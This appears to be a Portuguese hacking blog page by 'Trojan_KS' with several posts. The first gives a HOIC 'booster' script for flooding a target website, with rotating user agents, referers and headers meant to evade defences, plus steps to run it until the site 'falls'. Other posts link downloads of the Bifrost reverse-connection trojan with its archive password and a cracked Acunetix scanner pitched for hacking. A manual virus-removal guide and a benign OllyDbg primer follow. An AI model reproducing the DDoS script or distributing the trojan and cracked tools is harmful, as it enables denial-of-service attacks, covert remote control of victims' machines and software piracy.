Trojan_KS  

TODOS OS DIREITOS RESERVADOS DESDE 2009

                                                                                  Configurando Booster - #SenhorGamer

Olá pessoal, aqui é o Trojan_KS, e hoje eu estarei ensinando uma coisa que quase ninguem sabe..


Configurar o Booster do HOIC !

Ele da mais "impacto" na hora de atacar o site.

Bom primeiramente abra o Bloco de notas

Copie Este codigo : 









        Dim useragents() as String
        Dim referers() as String
        dim randheaders() as string
        Dim randURLs() as string

        // populate rotating urls
        // By Nathos, don't use to many threads or you may nuke yourself.
        // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com/"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
        // rotate out url
        URL =  randURLs(RndNumber(0, randURLs.UBound))

        // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

        // populate list
        useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
        useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
        useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
        useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
        useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
        useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
        useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
        useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
        useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
        useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
        useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
        useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
        useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
        useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
        useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
        useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

        // populate referer list
        referers.Append "https://www.google.com/?q=pt+corrupcao"
        referers.Append "https://www.google.com/?q=opmegaupload+anonymous+hacker"
        referers.Append "https://www.google.com/?q=anonymous+hacker"
        referers.Append URL
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com/"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"
randURLs.Append "http://sitealvo.com"


        // Add random headers
        randheaders.Append "Cache-Control: no-cache"
        randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
        randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
        randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
        randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
        randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
        randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
        randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
        randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
        randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
        randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
        randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
        randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
        randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"

        Headers.Append "Keep-Alive: 115"
        Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
        Headers.Append "Connection: keep-alive"

        // ------------------ DO NOT EDIT BELOW THIS LINE

        // generate random referer
        Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
        // generate random user agent (DO NOT MODIFY THIS LINE)
        Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
        // Generate random headers
        Headers.Append randheaders(RndNumber(0, randheaders.UBound))










As partes em vermelho é o lugar onde voce bota a url do site alvo.
Copie o código, cole no bloco de notas, salve dentro da pasta do hoic com a extenção .hoic


Nao esqueça de selecionar a opção "Todos os arquivos" no tipo de arquivo.., se nao ele slava como .txt




coloque qualquer nome.hoic  Ex:  MeuBooster.hoic



e clique em salvar.. depois disso voce pode fechar o bloco de notas e abrir o hoic

Depois de abrir o HOIC, veja o tutorial abaixo como usa-lo, e na hora de selecionar o Booster, selecione o que voce criou

Depois é só clicar no botao vermelho e esperar cair..


rapido viu,  se voce selecionasse algum outro booster, nao iria cair tao rapido assim...  como nós criamos o "Booster Teste.hoic", e configuramos ele corretamente, temos uma performance maior com o HOIC..

vídeo aula explicativa  : http://www.youtube.com/watch?v=6EaCJq-JfXE

                                                                                     Bifrost 1.2.1 - #SenhorGamer

Bifrost v1.2.1

Aqui é o Trojan_KS
Descrição: O Bifrost é um programa de computador do tipo trojan de conexão reversa. Isso significa que ao invés de o atacante ter que se conectar ao IP da vítima, a própria vítima se conecta ao atacante, que normalmente usa um programa de DNS como o NO-IP. O atacante cria um endereço DNS e utiliza o seu endereço DNS como host no trojan server, de modo que quando for executado, o server procura o host na internet, e só vai encontrar se o atacante estiver com o NO-IP ativo, (O DNS resolve um nome para o IP do host), desse modo, o server se conecta a máquina do atacante.  Apesar do programa ter sido criado para fins maliciosos, o Bifrost pode perfeitamente ser usado com boas intenções pois, um técnico ao prestar ajuda remotamente a um cliente, poderia precisar de controlar a máquina remotamente, para facilitar a vida do usuário, e se o técnico explicasse como instalar e configurar um outro programa de auxílio remoto qualquer, ele teria muito trabalho, pois explicar essas configurações complicadas e longas para um usuário leigo, seria no mínimo desanimador.  O bifrost, para poder funcionar corretamente, não precisa de nenhuma intervenção do usuário, pois aliás, o programa assim que o usuário o executa, não mostra nada na tela, basta o usuário clicar e pronto, sem configurar nada, facilitando muito a vida do técnico que bem intencionado, ajuda seu cliente de modo simples e rápido.  O fator segurança para isso, também é bastante satisfatório, pois o trojan server, é montado pelo técnico de modo completamente personalizado, assim, o técnico diz ao programa todos os dados: onde o trojan deve se conectar, em que porta e qual a Senha!. Alguns prints do Bifrost 1.2.1:

                                                                                 Sistema Operacional : Windows XP/Vista/7.


                                                                                      Desenvolvedor: Bifrost Software, Inc.
                                                                                       Tamanho: 639,97 Kb.

                                                                                                      Download a Baixo

Download 1 #Falha    https://www.dropbox.com/s/8rem5f82end33oa/Download_-_Bifrost_-_v1.2.1_-_By_Sketch-ADM..._www.tl-downs.blogspot.com.rar

Download 2    http://www.4shared.com/rar/I2NNs9Fu/Trojan_Bifrost_v1102.html

Download 3 #Falha    http://4shared.com%204shared.com/file/60091874/64068d80/Bifrost_121.html?dirPwdVerified=68391a1%20

                                                              Atenção.A senha para descompactar é: ChaseNet.org
                                                                         OBS: As letras C & N sao maiusculas. 
Clear Formatting

                                       Acunetix Vulnerability Scanner - #SenhorGamer

Olá pessoal, aqui é o Trojan_KS , e nesse post eu estarei falando sobre o Acunetix, e as falhas..Muitas pessoas estão à procura de Cross Site Scripting (XSS) vulnerabilidades em aplicações web: carrinhos de compras, formulários, páginas de login, conteúdo dinâmico são alvos fáceis. Vencê-los a ele e digitalizar suas aplicações web com Acunetix Web Vulnerability Scanner:

  • Acunetix WVS verifica automaticamente suas aplicações web para XSS SQL Injection, e outras vulnerabilidades.
  • Firewalls, servidores SSL e bloqueado-down são fúteis contra a pirataria de aplicativos web.
  • Acunetix verifica suas aplicações web para erros de codificação que resultam em vulnerabilidades Cross Site Scripting.
  • Acunetix também verifica outras vulnerabilidades em aplicações web populares, como o Joomla, PHPBB.
  • Acunetix identifica arquivos com as vulnerabilidades XSS que lhe permite corrigi-los antes que o hacker encontra-los!
Faça o Download desse aplicativo e VEJA! Tanto para testa a vulnerabilidade de seu site quanto para  usar como uma ferramenta hacking ^^, e o melhor disponibilizamos o Crack para você poder usar sem limites...

(Sem Qualquer tipo de virus!) Nome: Acunetix Web Vulnerability Scanner
Ano: 2009
Fabricante: Acunetix
Sistema Operacional: Windows
Estilo: Segurança Web
Tamanho: 21.1 MB
Formato: Rar
Número de Mídias: 1
Interface: 10
Facilidade de Uso: 10
Idioma: Inglês

Configuração Mínima:
* Windows 98/2000/2003/XP/Vista
* 512 MB de RAM (1G recomendado)
* 200 MB de espaço livre
* Microsoft Internet Explorer 6 (ou superior - Voce nao vai usar ele)



Download : http://www.mediafire.com/?9vs73yqzpigq31d

                                                                 Removendo Virus Manualmente - #SenhorGamer

Tirar Virus Do PC Sem Utilizar Anti Virus

Sem duvida esse é o melhor modo de remover virus manualmente no seu computador, todo hacker tem a obrigaçao de saber remover um virus manualmente... Vamos lá

1° PASSO: Vá em INICIAR, EXECUTAR e escreva REGEDIT.

2° PASSO: Clique no "+" da pasta HKEY_LOCAL_MACHINE.

3° PASSO: Clique no "+" da pasta SOFTWARE.

4° PASSO: Clique no "+" da pasta MICROSOFT.

5° PASSO: Clique no "+" da pasta WINDOWS.

6° PASSO: Clique no "+" da pasta CURRENTVERSION.

7° PASSO: Agora não clique no "+" e sim na pasta "RUN".

Agora procure por um arquivo com ."exe" tanto faz se ele esta maiusculo ou minusculo..
Alguns sao virus e outros nao , como vamos saber se é virus ou nao ?

É muito facil , você é OBRIGADO a saber os programas que estao instalados em seu computador , entao ai neste DIRETORIO ficam todos registros de programas instalados em sua MAQUINA , entao os virus tbm ficam registrados neste DIRETORIO ... agora para saber se é ou nao um virus , é o seguinte ; VOCE IRA OLHAR PARA O NOME DOS ARQUIVOS QUE TEM "EXE" "agente" "seu nome" "SERVER" RELACIONADO AO NOME , 80% É CERTO QUE É , CASO NAO TENHA NENHUM PROGRAMA COM ESSE NOME PODE SER VIRUS , VOU POSTAR UMA PRINT AQUI DEMONSTRANDO !

                                                                                                            Olly DBG

Há um tempo atrás eu comecei a escrever uma série de tutoriais sobre a utilização do OllyDbg, um debuuger para binários compilados. Pretendo dar continuidade ao trabalho e posteriormente criar um PDF com todo o conteúdo. Por enquanto, é possível acessá-lo no Forum Guia do Hardware, através do link abaixo (não há necessidade de registro para visualização do tutorial) pessoal!
Ultimamente tenho visto uma certa quantidade de posts relativos a programação em linguagem assembly e ao uso de debuggers (seja para depuração ou para fazer adaptações). Resolvi criar uma pequena série de tutoriais (comecei hoje) cobrindo alguns conceitos interessantes sobre a utilização de debuggers e um pouco de engenharia reversa. A medida que eu vou escrevendo eu vou postando aqui, em forma de post mesmo.

Por enquanto escrevi apenas uma introdução e o esclarecimento de alguns conceitos. Estou pensando ainda no aplicativo que vou programar para usar como exemplo de análise, mas provavelmente eu faça apenas aquele programa clássico de "adivinhe o número" (escolha um número de 1 a 10...). Pretendo utilizar o OllyDbg nos tutoriais, pois é o meu debugger predileto e o que estou mais familiarizado (gratuito e pequeno).

INTRODUÇÃO

Seguindo a minha linha de tutoriais voltados a programação, vou tratar sobre um assunto que me interessa muito e talvez seja interessante para os programadores em geral: disassembler e debuggers.

Primeiramente seria interessante esclarecer um pouco sobre o que é um debugger e o que é um disassembler, pois apesar de andarem quase sempre juntos, possuem finalidades diferentes.

Disassembler é algo que consegue transformar linguagem de máquina para a linguagem assembly, transcrevendo as instruções enviadas ao processador para os seus mnemônicos em assembly (asm). Não deve ser confundido com um descompilador, que procura converter o código nativo em uma linguagem de mais alto nível como C, C++ ou Basic.

Debuggers são programas capazes de analisar, depurar e testar aplicações. Atualmente a maioria das IDEs de programação contam com um debugger embutido (Visual Studio, por exemplo). A principal utilidade deles é para a identificação e tratamento de erro, sendo que é possível rodar o código linha por linha (ou instrução por instrução) e analisar a mudança das variáveis e do comportamento do código. Os debuggers de binários já compilados - como os executáveis do Windows (EXE) - seguem o mesmo conceito dos depuradores normais, mas devido ao fato de o código já ter sido compilado, ele precisa ter um disassembler embutido no debugger para decodificar as instruções.

Atualmente existem dezenas de debuggers e disassemblers por aí, dentre os quais os mais famosos são: W32DASM, IDA, WinDbg, SoftICE e Ollydbg. Neste tutorial será utilizado o OllyDbg, pois é um dos melhores e mais poderosos debuggers (incluindo um disassembler) disponíveis no mercado. É também pequeno e gratuito

Site oficial do OllyDbg, com o link para download: http://www.ollydbg.de

QUAL A UTILIDADE UM DEBUGGER?

Muita gente se pergunta do porquê de usar um debugger, sendo que na maioria dos casos você tem a acesso ao código fonte original (caso você tenha programado o aplicativo). Vou citar abaixo algumas das maiores utilidades de um debugger:

  • Tratamento de erro. Certamente uma das principais. Às vezes durante a programação de um aplicativo um pequeno erro passou despercebido, ocasionando mal funcionamento ou gerando uma operação ilegal. Em muitos casos é mais fácil você analisar o binário já compilado dentro de um debugger do que tentar encontrar o erro no código original. Dentro desse mesmo item podemos citar a correção de bugs de aplicações já descontinuadas (desde que com a autorização da empresa dona dos direitos).
  • Engenharia reversa. O processo de engenharia reversa de software não poderia ser feito de forma eficiente sem a utilização de um debugger/disassembler. Muitas pessoas tendem a confundir cracking com engenharia reversa, sendo que são conceitos diferentes. A engenharia reversa por si só é uma atividade completamente legal, pois muito do que vemos hoje só foi possível devido à engenharia reversa. A criação de drivers para Linux de periféricos que antes só funcionavam com o Windows (WinModems) é um bom exemplo de como a engenharia reversa traz coisas boas para nós.
  • Aprendizado. O uso de debuggers e engenharia reversa é uma das melhores formas de se aprender a linguagem assembly. Você programa algo em uma linguagem de médio ou alto nível e posteriormente analisa o resultado do binário compilado dentro de um debugger. Com esse conhecimento é possível dominar melhor a linguagem e criar algoritmos mais otimizados e eficientes.
CONCEITOS NECESSÁRIOS

Para entender o funcionamento de um debugger é preciso saber um pouco sobre alguns conceitos ligados a informática, como o funcionamento da memória, processador, pilhas e endereços. O conhecimento básico de assembly também é necessário, já que essa é a linguagem que teremos de analisar. Caso não tenha experiência em assembly, fique tranqüilo, pois nos capítulos seguintes darei uma visão geral sobre ela, o suficiente para entender o nosso mini-aplicativo de estudo. Abaixo segue uma breve lista de conceitos:
  • Processador/CPU: É o cérebro de todo computador. É ele que decodifica as instruções e executa os códigos operacionais. É composto basicamente por uma unidade lógico-aritmética (ALU), unidade de ponto flutuante (FPU), registradores, cachê, barramento e gerador de clock.

  • Memória RAM: Local de armazenamento temporário de dados (são apagados ao desligar o computador). Todo aplicativo se utiliza da memória para armazenar seus dados e estes são buscados e gerenciados pelo processador.

  • Endereçamento de memória: É uma faixa de valores que apontam para uma determinada posição de memória. Toda vez que você escreve ou lê algum dado da memória é necessário indicar o endereço de onde está aquele valor, para que o processador possa buscá-lo.

  • Pilha (Stack): É uma estrutura de dados. Sua principal característica é a forma de funcionamento, onde você apenas coloca ou retira os valores, sem indicar um endereço (LIFO – Last in, First Out – Último a entrar, primeiro a sair). Ela funciona de forma semelhante a uma pilha de livros em que você vai os empilhando. Quando precisar remover um deles, é necessário tirar todos os livros de cima.

  • Registradores: Pequenas partes de memória presentes dentro dos processadores (não confundir com memória RAM). Extremamente rápidas, sendo que a CPU as utiliza como forma temporária de armazenamento de dados e realização de operações. A quantidade de dados que podem ser armazenados vai depender do tipo de processador. Os processadores de 32 bits conseguem armazenar números de até 32 bits em cada registrador, sem precisar de rotinas de conversão

DOWNLOAD ====/\==== http://www.guiadohardware.net/comunidade/utilizando-debugger/785195/